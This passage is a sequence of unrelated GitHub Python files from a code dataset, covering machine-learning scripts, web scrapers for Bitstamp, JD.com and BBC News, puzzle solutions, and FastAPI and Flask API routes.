np.hstack((np.ones(len(car_features)), np.zeros(len(notcar_features))))\n\n#############\n# Parameter Estimation for SVM\n#X_train, X_test, y_train, y_test = train_test_split(\n# scaled_X, y, test_size=0.5, random_state=0)\n# Set the dataset in two equal parts\n#tuned_parameters = [{'kernel':['rbf'], 'gamma':[1e-3,1e-4], 'C': [1,10,100,1000]},\n# {'kernel':['linear'], 'C': [1,10,100,1000]}]\n#clf = GridSearchCV(SVC(C=1), tuned_parameters, cv=5)\n#clf.fit(X_train,y_train)\n#print(clf.best_params_)\n\n# Split up data into randomized training and test sets\nrand_state = np.random.randint(0, 100)\nX_train, X_test, y_train, y_test = train_test_split(\n scaled_X, y, test_size=0.2, random_state=rand_state)\n\nprint('Using:',orient,'orientations',pix_per_cell,\n 'pixels per cell and', cell_per_block,'cells per block')\nprint('Feature vector length:', len(X_train[0]))\n# Use a linear SVC \nsvc = LinearSVC()\n# Check the training time for the SVC\nt=time.time()\nsvc.fit(X_train, y_train)\nt2 = time.time()\nprint(round(t2-t, 2), 'Seconds to train SVC...')\n# Check the score of the SVC\nprint('Test Accuracy of SVC = ', round(svc.score(X_test, y_test), 4))\n# Check the prediction time for a single sample\n\nf = open(\"svc_pickle.p\", \"wb\" )\nparams ={\"svc\":svc, \"scaler\":X_scaler, \"orient\":orient, \"pix_per_cell\":pix_per_cell, \"cell_per_block\":cell_per_block, \n \"spatial_size\":spatial_size, \"hist_bins\":hist_bins}\npickle.dump(params, f)\nf.close()\n\nt=time.time()\n\nimg = mpimg.imread('test_images/test1.jpg')\n\nystart = 400\nystop = 656\n \nheat = np.zeros_like(img[:,:,0]).astype(np.float)\n\nbox_list = []\n\nfor scale in np.arange(0.5,2,0.2) :\n box_list = find_cars(img,box_list, ystart, ystop, scale, svc, X_scaler, orient, pix_per_cell, cell_per_block, spatial_size, hist_bins)\n\n# Add heat to each box in box list\nheat = add_heat(heat,box_list)\n \n# Apply threshold to help remove false positives\nheat = apply_threshold(heat,10) # 20 was best\n\n# Visualize the heatmap when displaying \nheatmap = np.clip(heat, 0, 255)\n\n# Find final boxes from heatmap using label function\nlabels = label(heatmap)\ndraw_img = draw_labeled_bboxes(np.copy(img), labels)\n\nplt.imshow(heatmap)\n","repo_name":"Jaeyong-Han/Self-Driving-Car_Nanodegree","sub_path":"CarND-Project5_Vehicle-Detection/search_classify.py","file_name":"search_classify.py","file_ext":"py","file_size_in_byte":9090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"73187922330","text":"import json\nimport logging\nimport os\nimport time\nfrom typing import Any, Dict, List, Optional\n\nimport requests\n\nlogging.basicConfig(level=logging.INFO)\n\n\ndef merge_data(prev: List[Dict[str, Any]], curr: List[Dict[str, Any]]) -> List[Dict[str, Any]]:\n '''Merge curr into prev, the element in list must have a date field.'''\n for c in curr:\n x: Optional[Dict[str, Any]] = None\n for p in prev:\n if p['date'] == c['date']:\n x = p\n break\n if x is None:\n prev.append(c)\n else:\n x.update(c)\n return sorted(prev, key=lambda d: d['date'])\n\n\ndef http_get(url: str, field_name: str) -> List[Dict[str, Any]]:\n resp = requests.get(url=url)\n if resp.status_code == 200:\n data = resp.json()\n return data[field_name]\n else:\n logging.warning(f'{url} {resp.status_code} {resp.text}')\n if resp.status_code == 429:\n exit(0)\n return []\n\n\ndef get_coins() -> List[str]:\n url = 'https://www.bitstamp.net/api/v2/trading-pairs-info/'\n resp = requests.get(url=url)\n if resp.status_code == 200:\n symbols = resp.json()\n coins = [s['name'].split('/')[0].lower() for s in symbols]\n coins = sorted(list(set(coins)))\n return coins\n else:\n logging.warning(f'{url} {resp.status_code} {resp.text}')\n if resp.status_code == 429:\n exit(0)\n return []\n\n\ndef get_price(coin: str) -> None:\n url = f'https://www.bitstamp.net/api-internal/stats/v1/{coin}/financial/price'\n curr = http_get(url=url, field_name='price')\n file_path = f'./data/price-{coin}.json'\n if os.path.exists(file_path):\n with open(file_path, 'rt') as f_in:\n prev = json.loads(f_in.read())\n else:\n prev = []\n prev = merge_data(prev, curr)\n with open(file_path, 'wt') as f_out:\n json.dump(prev, f_out, indent=2)\n\n\ndef get_transactions(coin: str) -> None:\n url = f'https://www.bitstamp.net/api-internal/stats/v1/{coin}/network/transactions'\n curr = http_get(url=url, field_name='txsStats')\n file_path = f'./data/transactions-{coin}.json'\n if os.path.exists(file_path):\n with open(file_path, 'rt') as f_in:\n prev = json.loads(f_in.read())\n else:\n prev = []\n prev = merge_data(prev, curr)\n with open(file_path, 'wt') as f_out:\n json.dump(prev, f_out, indent=2)\n\n\ndef get_addresses(coin: str) -> None:\n url = f'https://www.bitstamp.net/api-internal/stats/v1/{coin}/network/addresses'\n curr = http_get(url=url, field_name='addressesStats')\n file_path = f'./data/addresses-{coin}.json'\n if os.path.exists(file_path):\n with open(file_path, 'rt') as f_in:\n prev = json.loads(f_in.read())\n else:\n prev = []\n prev = merge_data(prev, curr)\n with open(file_path, 'wt') as f_out:\n json.dump(prev, f_out, indent=2)\n\n\ndef get_large_transactions(coin: str) -> None:\n url = f'https://www.bitstamp.net/api-internal/stats/v1/{coin}/financial/large_transactions'\n file_path = f'./data/large_transactions-{coin}.json'\n curr = http_get(url=url, field_name='largeTxs')\n if os.path.exists(file_path):\n with open(file_path, 'rt') as f_in:\n prev = json.loads(f_in.read())\n else:\n prev = []\n prev = merge_data(prev, curr)\n with open(file_path, 'wt') as f_out:\n json.dump(prev, f_out, indent=2)\n\n\nif __name__ == \"__main__\":\n # // 8000 requests per 10 minutes, see `REQUEST LIMITS` at https://www.bitstamp.net/api/\n cooldown_time = 0.075\n coins = get_coins()\n for coin in coins:\n logging.info(coin)\n get_price(coin)\n time.sleep(cooldown_time)\n get_transactions(coin)\n time.sleep(cooldown_time)\n get_addresses(coin)\n time.sleep(cooldown_time)\n get_large_transactions(coin)\n time.sleep(cooldown_time)\n","repo_name":"crypto-crawler/bitstamp-insights","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":3908,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"74190914652","text":"'''\n1. 공백을 기준으로 slice후 리스트 저장: str.slice()\n2. list[i] %2 == 0 : upper\n3. list[i] %2 != 0 : lower\n'''\n\ndef solution(s):\n answer = ''\n new_list = s.split(' ')\n for i in new_list:\n for j in range(len(i)):\n if j%2==0:\n answer += i[j].upper()\n else:\n answer += i[j].lower()\n answer += ' '\n return answer[0:-1]\n \n \n\nprint(solution(\"try hello world\"))","repo_name":"dayowoo/Algorithm-Study","sub_path":"programmers/Level1/이상한 문자 만들기.py","file_name":"이상한 문자 만들기.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"24473868260","text":"import sqlite3\nimport mutagen\n\n\nclass Album:\n def __init__(self, db_path):\n self.db_path = db_path\n self.conn = sqlite3.connect(self.db_path)\n self.cur = self.conn.cursor()\n\n # def __del__(self):\n # self.conn.close()\n\n def add_album(self, title, artist_name):\n self.cur.execute(\"SELECT id FROM artist WHERE name = ?\", (artist_name,))\n artist_id = self.cur.fetchone()\n if not artist_id:\n self.cur.execute(\"INSERT INTO artist (name) VALUES (?)\", (artist_name,))\n artist_id = self.cur.lastrowid\n else:\n artist_id = artist_id[0]\n self.cur.execute(\"INSERT INTO album (title, artist_id) VALUES (?, ?, ?)\", (title, artist_id))\n self.conn.commit()\n\n def delete_album(self, album_id):\n self.cur.execute(\"DELETE FROM album WHERE id = ?\", (album_id,))\n self.conn.commit()\n\n def modify_tag(self, album_id, field, value):\n self.cur.execute(\"SELECT filename FROM library WHERE album_id = ?\", ( album_id,))\n filenames = self.cur.fetchall()\n for filename in filenames:\n try:\n audio = mutagen.File(filename[0])\n if audio:\n audio[field] = value\n audio.save()\n except Exception as e:\n print(f\"Error modifying tag for {filename[0]}: {e}\")\n\n def show(self, album_id):\n self.cur.execute(\n \"SELECT album.title, artist.name FROM album JOIN artist ON album.artist_id = artist.id WHERE album.id = ?\",\n (album_id,))\n row = self.cur.fetchone()\n if row:\n print(f\"Album: {row[0]}\")\n print(f\"Artist: {row[1]}\")\n self.cur.execute(\"SELECT title, artist, duration, genre FROM library WHERE album_id = ?\", (album_id,))\n rows = self.cur.fetchall()\n for row in rows:\n print(row)\n","repo_name":"kandriadze/cli_id3","sub_path":"Album.py","file_name":"Album.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"13642561739","text":"'''\nFrom https://github.com/tsc2017/Inception-Score\nCode derived from https://github.com/openai/improved-gan/blob/master/inception_score/model.py and https://github.com/tensorflow/tensorflow/blob/master/tensorflow/contrib/gan/python/eval/python/classifier_metrics_impl.py\n\nUsage:\n Call get_inception_score(images, splits=10)\nArgs:\n images: A numpy array with values ranging from 0 to 255 and shape in the form [N, 3, HEIGHT, WIDTH] where N, HEIGHT and WIDTH can be arbitrary. \n dtype of the images is recommended to be np.uint8 to save CPU memory.\n splits: The number of splits of the images, default is 10.\nReturns:\n Mean and standard deviation of the Inception Score across the splits.\n'''\n\nimport os, sys\nimport functools\nimport time\nimport argparse\nfrom tqdm import tqdm\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import functional_ops\ntfgan = tf.contrib.gan\n\n\nclass InceptionScore():\n def __init__(self, batch_size, name):\n self.batch_size = batch_size \n self.inception_images = tf.placeholder(tf.float32, [self.batch_size, 3, None, None])\n self.logits = self.inception_eval(name)\n\n def inception_eval(self, name):\n images = self.inception_images\n images = tf.transpose(images, [0, 2, 3, 1])\n size = 299\n images = tf.image.resize_bilinear(images, [size, size])\n generated_images_list = array_ops.split(images, num_or_size_splits=1)\n logits = functional_ops.map_fn(\n fn = functools.partial(tfgan.eval.run_inception, output_tensor=name),\n elems = array_ops.stack(generated_images_list),\n parallel_iterations = 1,\n back_prop = False,\n swap_memory = True,\n name = 'RunClassifier')\n logits = array_ops.concat(array_ops.unstack(logits), 0)\n return logits\n\n def get_inception_probs(self, sess, inps):\n n_batches = len(inps) // self.batch_size\n preds = np.zeros([n_batches * self.batch_size, 1000], dtype=np.float32)\n for i in tqdm(range(n_batches)):\n inp = inps[i * self.batch_size : (i + 1) * self.batch_size] / 127.5 - 1\n preds[i * self.batch_size : (i + 1) * self.batch_size] = sess.run(self.logits, feed_dict={self.inception_images: inp})[:, :1000]\n preds = np.exp(preds) / np.sum(np.exp(preds), 1, keepdims=True)\n return preds\n\n def preds2score(self, preds):\n scores = []\n splits = 1\n for i in range(splits):\n part = preds[(i * preds.shape[0] // splits):((i + 1) * preds.shape[0] // splits), :]\n kl = part * (np.log(part) - np.log(np.expand_dims(np.mean(part, 0), 0)))\n kl = np.mean(np.sum(kl, 1))\n scores.append(np.exp(kl))\n return np.mean(scores), np.std(scores)\n\n def get_inception_score(self, images):\n assert(type(images) == np.ndarray)\n assert(len(images.shape) == 4)\n assert(images.shape[1] == 3)\n assert(np.min(images[0]) >= 0 and np.max(images[0]) > 10), 'Image values should be in the range [0, 255]'\n print('Calculating Inception Score with %i images in %i splits' % (images.shape[0], 1))\n start_time = time.time()\n with tf.Session() as sess:\n preds = self.get_inception_probs(sess, images)\n mean, std = self.preds2score(preds)\n print('Inception Score calculation time: %f s' % (time.time() - start_time))\n return mean, std # Reference values: 11.34 for 49984 CIFAR-10 training set images, or mean=11.31, std=0.08 if in 10 splits.\n\ndef get_images_from_files(path):\n import cv2\n #images = np.empty(shape=[50000, 3, 32, 32], dtype=np.uint8) # CIFAR10\n #images = np.empty(shape=[100000, 3, 48, 48], dtype=np.uint8) # STL10 (unlabeled, resized)\n images = np.empty(shape=[50000, 3, 48, 48], dtype=np.uint8) # STL10 (generated)\n idx = 0\n for root, dir, files in os.walk(path):\n for file in files:\n if file.endswith(tuple(['.jpg', '.png', 'bmp'])):\n image_path = os.path.join(root, file)\n img = cv2.imread(image_path)\n img = img[:, :, (2, 1, 0)] # BGR to RGB \n img = np.transpose(img, (2, 0, 1)) # RGB, H, W \n images[idx] = img\n idx += 1\n if idx >= images.shape[0]:\n break\n print('images.shape: {}'.format(images.shape))\n return images\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--gpu', help='comma separated GPU list to use')\n parser.add_argument('--data_dir', help='path to data folder')\n args = parser.parse_args()\n\n if args.gpu:\n os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu \n\n images = get_images_from_files(args.data_dir) \n mean, std = InceptionScore(64, 'logits:0').get_inception_score(images)\n print('IS: ', mean, std)\n\n # images = get_images_from_files(args.data_dir)\n # with tf.Session() as sess:\n # preds = InceptionScore(100, 'pool_3:0').get_inception_probs(sess, images)\n # #np.save('/home/minje/dev/dataset/cifar/cifar10_inception_pool_3.npy', preds)\n # np.save('/home/minje/dev/dataset/stl/stl_unlabeled_inception_pool_3.npy', preds)\n \n\n","repo_name":"swotr/snwgan","sub_path":"IS/inception_score.py","file_name":"inception_score.py","file_ext":"py","file_size_in_byte":5356,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"5168009945","text":"\"\"\"see https://adventofcode.com/2022/day/1\"\"\"\r\n\r\nfrom argparse import ArgumentParser\r\nfrom typing import Iterator\r\n\r\ndef make_parser() -> ArgumentParser:\r\n parser = ArgumentParser()\r\n parser.add_argument(\"input\", help=\"input file\")\r\n return parser\r\n\r\ndef split_on(s, seq):\r\n \"\"\"splits seq on s\"\"\"\r\n acc = []\r\n for each in seq:\r\n if each == s:\r\n yield acc\r\n acc = []\r\n else:\r\n acc.append(each)\r\n yield acc\r\n\r\nif __name__ == '__main__':\r\n matches = make_parser().parse_args()\r\n with open(matches.input, 'r') as fptr:\r\n input = fptr.readlines()\r\n nums = [int(l) if l.strip().isnumeric() else None for l in input]\r\n elves_split: list[list[int]] = list(split_on(None, nums))\r\n cals: list[int] = list(map(sum, elves_split))\r\n print(max(cals))\r\n cals.sort(reverse=True)\r\n top_3: list[int] = cals[:3]\r\n print(f\"top 3: {top_3}\")\r\n print(f\"total of top 3: {sum(top_3)}\")","repo_name":"vernonrj/advent2022","sub_path":"day01/puzzle01.py","file_name":"puzzle01.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"10071086313","text":"from typing import List\nfrom uuid import UUID\n\nfrom fastapi import Depends\nfrom fastapi_utils.cbv import cbv\nfrom fastapi_utils.inferring_router import InferringRouter\nfrom fastapi_utils.api_model import APIMessage\n\nfrom ..services import OrderItemService\nfrom ..schemas import (\n OrderItemCreate, OrderItemUpdate, OrderItemGet,\n)\nfrom .base_api import BaseAPI\n\nrouter = InferringRouter()\n\n\n# noinspection PyTypeChecker\n@cbv(router)\nclass OrderItemAPI(BaseAPI):\n service: OrderItemService = Depends()\n\n @router.get('/')\n async def get_many(\n self, offset: int = 0, limit: int = 20,\n order_uid: UUID = None\n ) -> List[OrderItemGet]:\n return await self._get_many(\n limit, offset, order_uid=order_uid\n )\n\n @router.get(\"/{uid}/\")\n async def get_one(\n self, uid: UUID\n ) -> OrderItemGet:\n return await self._get_one(uid)\n\n @router.post(\"/\")\n async def create_one(\n self, obj: OrderItemCreate\n ) -> OrderItemGet:\n return await self._create_one(obj)\n\n @router.put(\"/{uid}/\")\n async def update_one(\n self, uid: UUID, obj: OrderItemUpdate\n ) -> OrderItemGet:\n return await self._update_one(obj, uid)\n\n @router.delete(\"/{uid}/\")\n async def delete_one(\n self, uid: UUID\n ) -> APIMessage:\n return await self._delete_one(uid)\n","repo_name":"ashapochka/chainvoice","sub_path":"app/api/order_item_api.py","file_name":"order_item_api.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"}
+{"seq_id":"21312596308","text":"from bs4 import BeautifulSoup as bs\r\nfrom selenium import webdriver \r\nfrom selenium.common.exceptions import TimeoutException\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.phantomjs.webdriver import WebDriver\r\nimport json\r\nfrom time import sleep\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver import ActionChains\r\nfrom random import randint\r\nfrom multiprocessing import Semaphore,Process\r\nimport re\r\nimport os\r\n\r\ndef get_cookie():\r\n\toptions=webdriver.ChromeOptions()\r\n\tprefs = {\"profile.managed_default_content_settings.images\": 2,'profile.default_content_setting_values' : { 'notifications' : 2 }}\r\n\toptions.add_experimental_option(\"prefs\", prefs)\r\n\tuser_ag='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36'\r\n\toptions.add_argument('--user-agent=%s'%user_ag)\r\n\toptions.add_argument('--disable-infobars')\r\n\toptions.add_argument('--disable-gpu') \r\n\toptions.add_argument('--incognito')\r\n\t#options.add_argument('--headless')\r\n\tdriver = webdriver.Chrome(chrome_options=options)\r\n\tdriver.get('https://passport.jd.com/new/login.aspx?ReturnUrl=https%3A%2F%2Fwww.jd.com%2F')\r\n\ttry:\r\n\t\tresult=WebDriverWait(driver,100).until(EC.title_is('京东(JD.COM)-正品低价、品质保障、配送及时、轻松购物!'))\r\n\texcept:\r\n\t\tprint(\"no!!\")\r\n\r\n\tcookies=driver.get_cookies()\r\n\tcookies=json.dumps(cookies)\r\n\twith open(\"cookies.json\",\"w\") as fbb:\r\n\t\t\tjson.dump(cookies,fbb)\r\n\r\nsem_all_html=Semaphore(1)\r\nsem_end=Semaphore(0)\r\nsem_url=Semaphore(0)\r\nsem_cook=Semaphore(1)\r\nclass acq_url(Process):\r\n\tdef __init__(self):\r\n\t\tsuper(acq_html,self).__init__()\r\n\tdef run(self):\r\n\t\toptions=webdriver.ChromeOptions()\r\n\t\tprefs = {\"profile.managed_default_content_settings.images\": 2,'profile.default_content_setting_values' : { 'notifications' : 2 }}\r\n\t\toptions.add_experimental_option(\"prefs\", prefs)\r\n\t\tuser_ag='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36'\r\n\t\toptions.add_argument('--user-agent=%s'%user_ag)\r\n\t\toptions.add_argument('--disable-infobars')\r\n\t\toptions.add_argument('--disable-gpu') \r\n\t\toptions.add_argument('--incognito')\r\n\t\t#options.add_argument('--headless')\r\n\t\tpage_num=10\r\n\t\tdriver = webdriver.Chrome(chrome_options=options)\r\n\t\tsem_cook.acquire()\r\n\t\twith open(\"cookies.json\",\"r\") as f:\r\n\t\t\tcookies=json.loads(json.load(f))\r\n\t\tsem_cook.release()\r\n\t\tdriver.get(\"https://www.jd.com\")\r\n\t\tdriver.delete_all_cookies()\r\n\t\tfor cookie in cookies:\r\n\t\t\tdriver.add_cookie(cookie)\r\n\t\tsleep(0.5)\r\n\t\tdriver.find_element_by_xpath('//*[@id=\"key\"]').send_keys('蓝牙键盘')\r\n\t\tsleep(2)\r\n\t\tdriver.find_element_by_xpath('//*[@id=\"search\"]/div/div[2]/button').click()\r\n\t\tac=ActionChains(driver)\r\n\t\tfor i1 in range(page_num):\r\n\t\t\tfor i in range(4):\r\n\t\t\t\tsleep(randint(0,3))\r\n\t\t\t\tac.send_keys(Keys.PAGE_DOWN).perform()\r\n\t\t\t\tprint(i)\r\n\t\r\n\t\t\tsleep(randint(3,5))\r\n\r\n\t\t\twith open(\"page_\"+str(i1)+'.html','wb') as f:\r\n\t\t\t\tf.write(driver.page_source.encode(\"utf-8\",\"ignore\"))\r\n\t\t\tsem_url.release()\r\n\t\t\tprint(\"写入成功\",i1)\r\n\t\t\tsleep(randint(5,8))\r\n\t\t\tac.send_keys(Keys.RIGHT).perform()\r\n\r\nclass acq_html(Process):\r\n\tdef __init__(self):\r\n\t\tsuper(acq_data,self).__init__()\r\n\t\r\n\tdef run(self):\r\n\t\toptions=webdriver.ChromeOptions()\r\n\t\tprefs = {\"profile.managed_default_content_settings.images\": 2,'profile.default_content_setting_values' : { 'notifications' : 2 }}\r\n\t\toptions.add_experimental_option(\"prefs\", prefs)\r\n\t\tuser_ag='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36'\r\n\t\toptions.add_argument('--user-agent=%s'%user_ag)\r\n\t\toptions.add_argument('--disable-infobars')\r\n\t\toptions.add_argument('--disable-gpu') \r\n\t\toptions.add_argument('--incognito')\r\n\t\t#options.add_argument('--headless')\r\n\t\tdriver = webdriver.Chrome(chrome_options=options)\r\n\t\tsem_cook.acquire()\r\n\t\twith open(\"cookies.json\",\"r\") as f:\r\n\t\t\tcookies=json.loads(json.load(f))\r\n\t\tsem_cook.release()\r\n\t\tdriver.get(\"https://www.jd.com\")\r\n\t\tdriver.delete_all_cookies()\r\n\t\tfor cookie in cookies:\r\n\t\t\tdriver.add_cookie(cookie)\r\n\t\tac=ActionChains(driver)\r\n\t\tfor i in range(10):\r\n\t\t\tsem_url.acquire()\r\n\t\t\twith open(\"page_\"+str(i)+\".html\",'rb') as f:\r\n\t\t\t\ttext=bs(f.read(),'html.parser')\r\n\t\t\tlianjie=[]\r\n\t\t\tfor link in text.find_all('strong'):\r\n\t\t\t\tfor lin in link.find_all('a'):\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\tlianjie.append(\"https:\"+lin.get(\"href\"))\r\n\t\t\t\t\texcept:\r\n\t\t\t\t\t\tprint(\"null\")\r\n\t\t\tfor ind,t in enumerate(lianjie):\r\n\t\t\t\tprint(t)\r\n\t\t\t\tdriver.get(t)\r\n\t\t\t\tpage_all=-1\r\n\t\t\t\tfor index in range(2,7):\r\n\t\t\t\t\tsleep(randint(0,2))\r\n\t\t\t\t\tfor n in range (randint(2,4)):\r\n\t\t\t\t\t\tac.send_keys(Keys.PAGE_DOWN).perform()\r\n\t\t\t\t\t\tsleep(randint(0,3))\r\n\t\t\t\t\t#if page_all==-1:\r\n\t\t\t\t\t\t#cc=driver.find_element_by_xpath('/html/body/div[10]/div[2]/div[3]/div[2]/div[2]/div[1]/ul/li[1]/a/em').text\r\n\t\t\t\t\t\t#cc=driver.find_elements_by_css_selector(\"[data-anchor='#comment']\")\r\n\t\t\t\t\t\t#cc=driver.find_elements_by_link_text('商品评价')\r\n\t\t\t\t\t\t#all_num=cc.text\r\n\t\t\t\t\tsem_all_html.acquire()\r\n\t\t\t\t\twith open(\"all.html\",'ab') as f:\r\n\t\t\t\t\t\tf.write(driver.page_source.encode(\"utf-8\",\"ignore\"))\r\n\t\t\t\t\tsem_all_html.release()\r\n\t\t\t\t\tif sem_end.get_value()<0:\r\n\t\t\t\t\t\tsem_end.release()\r\n\t\t\t\t\tprint(\"save!!\")\r\n\t\t\t\t\tsleep(randint(5,8))\r\n\t\t\t\t\tflag=-1\r\n\t\t\t\t\tfor indx,ele in enumerate(driver.find_elements_by_link_text(str(index))):\r\n\t\t\t\t\r\n\t\t\t\t\t\ttx = ele.get_attribute(\"rel\")\r\n\t\t\t\r\n\t\t\t\t\r\n\t\t\t\t\t\ttry:\r\n\t\t\t\t\t\t\tif tx==str(index):\r\n\t\t\t\t\t\t\t\tprint(\"ins\")\r\n\t\t\t\t\t\t\t\tflag=1\r\n\t\t\t\t\t\t\t\tele.click()\r\n\t\t\t\t\t\texcept:\r\n\t\t\t\t\t\t\tprint(\"ee\",indx)\r\n\t\t\t\t\r\n\t\t\t\t\tif flag==-1:\r\n\t\t\t\t\t\tbreak\r\n\t\tsem_end.release()\r\n\t\tsem_end.release()\r\n\t\tsem_end.release()\r\nclass acq_data(Process):\r\n\tdef __init__(self):\r\n\t\tsuper(acq_data,self).__init__()\r\n\t\r\n\tdef run(self):\r\n\t\tcommit=[]\r\n\t\twhile sem_end.get_value()==0:\r\n\t\t\tif os.path.exists(\"all.html\"):\r\n\t\t\t\tprint(\"存在\")\r\n\t\t\t\tsem_all_html.acquire()\r\n\t\t\t\twith open(\"all.html\",'rb') as f:\r\n\t\t\t\t\tgg=f.read().split(b' 90)\n ]\n .copy()\n .sort_values([\"gkCombinedIndex\"], ascending=False)[\n [\n \"first_name\",\n \"second_name\",\n \"name\",\n \"form\",\n \"selected_by_percent\",\n \"total_points\",\n \"minutes\",\n \"influence\",\n \"creativity\",\n \"threat\",\n \"gkCombinedIndex\",\n ]\n ]\n .copy()\n )\n\n top_def = (\n player_core.loc[\n (player_core[\"singular_name_short\"] == \"DEF\")\n & (player_core[\"minutes\"] > 90)\n ]\n .copy()\n .sort_values([\"defCombinedIndex\"], ascending=False)[\n [\n \"first_name\",\n \"second_name\",\n \"name\",\n \"form\",\n \"selected_by_percent\",\n \"total_points\",\n \"minutes\",\n \"influence\",\n \"creativity\",\n \"threat\",\n \"defCombinedIndex\",\n ]\n ]\n .copy()\n )\n\n top_mid = (\n player_core.loc[\n (player_core[\"singular_name_short\"] == \"MID\")\n & (player_core[\"minutes\"] > 90)\n ]\n .copy()\n .sort_values([\"midCombinedIndex\"], ascending=False)[\n [\n \"first_name\",\n \"second_name\",\n \"name\",\n \"form\",\n \"selected_by_percent\",\n \"total_points\",\n \"minutes\",\n \"influence\",\n \"creativity\",\n \"threat\",\n \"midCombinedIndex\",\n ]\n ]\n .copy()\n )\n\n top_fwd = (\n player_core.loc[\n (player_core[\"singular_name_short\"] == \"FWD\")\n & (player_core[\"minutes\"] > 90)\n ]\n .copy()\n .sort_values([\"fwdCombinedIndex\"], ascending=False)[\n [\n \"first_name\",\n \"second_name\",\n \"name\",\n \"form\",\n \"selected_by_percent\",\n \"total_points\",\n \"minutes\",\n \"influence\",\n \"creativity\",\n \"threat\",\n \"fwdCombinedIndex\",\n ]\n ]\n .copy()\n )\n\n pass\n\n\nif __name__ == \"__main__\":\n imported_data = importData()\n out = preProc(imported_data)\n","repo_name":"desiretheory/fpl","sub_path":"fpl/fpl/analyse.py","file_name":"analyse.py","file_ext":"py","file_size_in_byte":9455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"29589209738","text":"from bs4 import BeautifulSoup\r\nimport requests\r\nimport time\r\nfrom datetime import datetime\r\n\r\n#set default variable\r\ncurrent_top1 = \"Blank\"\r\ni = 0\r\n\r\n# create infinite loop to keep program running\r\nwhile True:\r\n # use BeautifulSoup to get BBC web page and access top story #1 headline\r\n page = requests.get(\"https://www.bbc.co.uk/news\")\r\n soup = BeautifulSoup(page.content, 'html.parser')\r\n top1_div = soup.find(\"div\", attrs={\"data-entityid\": \"container-top-stories#1\"})\r\n top1_head = top1_div.h3.string\r\n\r\n # used to add timestamp to any change to top story\r\n now = datetime.now()\r\n current_time = now.strftime(\"%d/%m/%Y, %H:%M:%S\")\r\n\r\n # check if top story headline has changed and print relevant result\r\n if(top1_head != current_top1):\r\n print(\"New Top Story!!! (\", current_time, \")\")\r\n print(top1_head)\r\n current_top1 = top1_head\r\n i=0\r\n else:\r\n if(i % 10 == 0):\r\n print(\"No change to top story, current top story is:\")\r\n print(top1_head)\r\n else:\r\n print(\"...\")\r\n i+=1\r\n # to add delay to loop re-running\r\n time.sleep(10.0)\r\n","repo_name":"EuanDodds/Portfolio-Projects","sub_path":"bbc_top_story.py","file_name":"bbc_top_story.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"74895826010","text":"class Solution:\n def removeDuplicates(self, s: str, k: int) -> str:\n stack = [] # [{\"a\":3} , {\"b\":5} , ...]\n for i, ch in enumerate(s):\n if stack and stack[-1][0] == ch:\n stack[-1][1] += 1\n if stack[-1][1] == k:\n stack.pop()\n else:\n stack.append([ch, 1])\n\n return ''.join(c * k for c, cnt in stack)\n","repo_name":"debbs061/algorithm","sub_path":"src/1209-remove-all-adjacent-duplicates-in-string-2.py","file_name":"1209-remove-all-adjacent-duplicates-in-string-2.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"12601230276","text":"from flask import Blueprint, jsonify, request\nfrom flask_login import login_required, current_user\nfrom app.models.category import db, Category\nfrom ..forms.category_form import CategoryForm\nfrom .auth_routes import validation_errors_to_error_messages\n\ncategory_routes = Blueprint('categories', __name__)\n\n\n# CREATE A NEW CATEGORY\n@category_routes.route('/new', methods=['POST'])\n@login_required\ndef create_category():\n form = CategoryForm()\n form['csrf_token'].data = request.cookies['csrf_token']\n\n if form.validate_on_submit():\n category = Category(\n name=form.data['name'],\n user_id=current_user.id\n )\n db.session.add(category)\n db.session.commit()\n\n return category.to_dict(), 200\n else:\n return {'errors': validation_errors_to_error_messages(form.errors)}, 401\n\n\n# READ ALL CATEGORIES\n@category_routes.route('/')\n@login_required\ndef user_categories():\n user_categories = Category.query.filter_by(user_id=current_user.id).all()\n return {'categories': [category.to_dict() for category in user_categories]}, 200\n\n\n# GET CATEGORY INFO BASED ON CATEGORY ID (GRABS ALL ITEMS IN CATEGORY)\n@category_routes.route('/')\n@login_required\ndef one_category(category_id):\n user_category = Category.query.get(category_id)\n if user_category:\n if user_category.user_id == current_user.id:\n return {'category': user_category.to_dict()}, 200\n else:\n return {'errors': 'Unauthorized to get this category'}, 401\n else:\n return {'errors': 'Category not found'}, 404\n\n\n# UPDAE A CATEGORY NAME BASED ON CATEGORY ID\n@category_routes.route('/', methods=[\"PUT\", 